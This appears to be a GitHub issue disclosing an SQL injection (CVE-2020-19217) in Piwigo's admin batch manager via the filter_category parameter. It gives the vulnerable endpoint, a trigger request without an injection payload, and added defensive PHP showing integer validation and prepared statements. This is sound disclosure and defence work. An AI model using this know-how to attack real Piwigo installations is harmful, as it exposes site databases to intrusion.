CVE-2020-19217: SQL injection in admin/batch_manager.php · Issue #1012 · Piwigo/Piwigo
SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager.
Hi, there is a vulnerability in admin/batch_manager.php.
I didn't find the full trigger request in the browser, so I added the '&filter_category_use=on' parameter to the request based on the code.
POST /admin.php?page=batch_manager HTTP/1.1
Host: 10.150.10.186:30002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 695
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
Connection: close
Upgrade-Insecure-Requests: 1
start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicates_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_ratio=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_max=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=0&regenerateSuccess=0&regenerateError=0
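The report above identifies filter_category (sent together with filter_category_use=on) as the injectable parameter. The following is an added example of how a defender would handle that parameter on the server side; it is not Piwigo's code and not taken from the issue. The function names, the use of PDO, and the table and column names are assumptions made for illustration. The point it shows is that a category filter value should be accepted only if it is a plain positive integer and should reach the database only as a bound parameter, never as part of the SQL string.

```php
<?php
// Added example (not Piwigo's code). Function names, PDO usage, and the
// table/column names (image_category, category_id, image_id) are assumptions.

/**
 * Read the category filter from the POST array.
 * Returns the id as an int, or null when the filter is disabled or the
 * value is anything other than a positive decimal integer.
 */
function read_category_filter(array $post): ?int
{
    // The filter is only meaningful when its checkbox was sent.
    if (($post['filter_category_use'] ?? '') !== 'on') {
        return null;
    }
    $raw = (string) ($post['filter_category'] ?? '');
    // Strict allow-list: digits only, no leading zero. A bare (int) cast
    // would silently turn a tampered value into 1 and hide the attempt,
    // so the request is rejected instead of coerced.
    if (!preg_match('/^[1-9][0-9]*$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/**
 * Build the category query as a prepared statement with a typed bound
 * value, so the id is never interpolated into the SQL text.
 */
function build_category_filter(PDO $db, ?int $category_id): ?PDOStatement
{
    if ($category_id === null) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT image_id FROM image_category WHERE category_id = :cat'
    );
    $stmt->bindValue(':cat', $category_id, PDO::PARAM_INT);
    return $stmt;
}

// Constructed sample inputs in the same shape as the report's POST body.
$cases = [
    ['filter_category_use' => 'on', 'filter_category' => '1'],      // accepted
    ['filter_category_use' => 'on', 'filter_category' => '1abc'],   // rejected
    ['filter_category_use' => 'on', 'filter_category' => '0'],      // rejected
    ['filter_category_use' => 'on', 'filter_category' => ''],       // rejected
    ['filter_category' => '1'],                                     // filter not enabled
];
foreach ($cases as $post) {
    $id = read_category_filter($post);
    printf("%-8s => %s\n",
        var_export($post['filter_category'] ?? null, true),
        $id === null ? 'reject / ignore' : "category_id=$id");
}
```

A rejected value is worth logging with the session id and remote address: a non-numeric filter_category on an admin page is a useful signal for detection, since the legitimate UI only ever submits integer ids for this field.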